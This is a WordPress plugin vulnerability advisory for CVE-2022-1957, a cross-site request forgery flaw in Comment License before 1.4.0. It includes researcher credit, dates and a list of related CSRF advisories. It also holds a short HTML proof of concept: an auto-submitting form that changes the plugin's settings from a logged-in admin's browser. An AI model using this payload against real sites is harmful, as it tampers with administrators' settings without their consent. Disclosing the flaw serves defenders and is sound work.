Comment License < 1.4.0 – Arbitrary Settings Update via CSRF | CVE 2022-1957 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="akcl_text" value="changed content by hacker">
    <input type="text" name="ak_action" value="aktt_update_settings">
    <input type="text" name="ak_action" value="akcl_update_settings">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

comment-license

Fixed in 1.4.0

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

ad3f6f3d-e12c-4867-906c-73aa001c7351

Timeline

Publicly Published

2022-06-16 (about 3 years ago)

Added

2022-06-16 (about 3 years ago)

Last Updated

2023-03-22 (about 2 years ago)

Other

Published

Title

Published

2024-09-30

Title

CartBounty – Save and recover abandoned carts for WooCommerce < 8.2.1 - Cross-Site Request Forgery

Published

2025-03-27

Title

publish post email notification < 1.0.2.4 - Cross-Site Request Forgery

Published

2016-12-09

Title

Multisite Post Duplicator < 1.1.3 - Cross-Site Request Forgery (CSRF)

Published

2025-06-05

Title

WP Time Slots Booking Form < 1.2.31 - Cross-Site Request Forgery

Published

2014-08-01

Title

Ultimate Auction 1.0 - Cross-Site Request Forgery (CSRF)